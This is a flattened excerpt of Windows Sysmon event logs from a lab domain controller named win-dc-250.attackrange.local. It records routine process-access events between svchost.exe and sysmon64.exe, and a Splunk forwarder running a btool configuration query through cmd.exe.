13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4299-6000-4300-000000009A01}39923996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{00000000-0000-0000-0000-000000000000}4092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.924{08A6967A-4299-6000-4700-000000009A01}4092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4299-6000-4300-000000009A01}3992C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.900{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 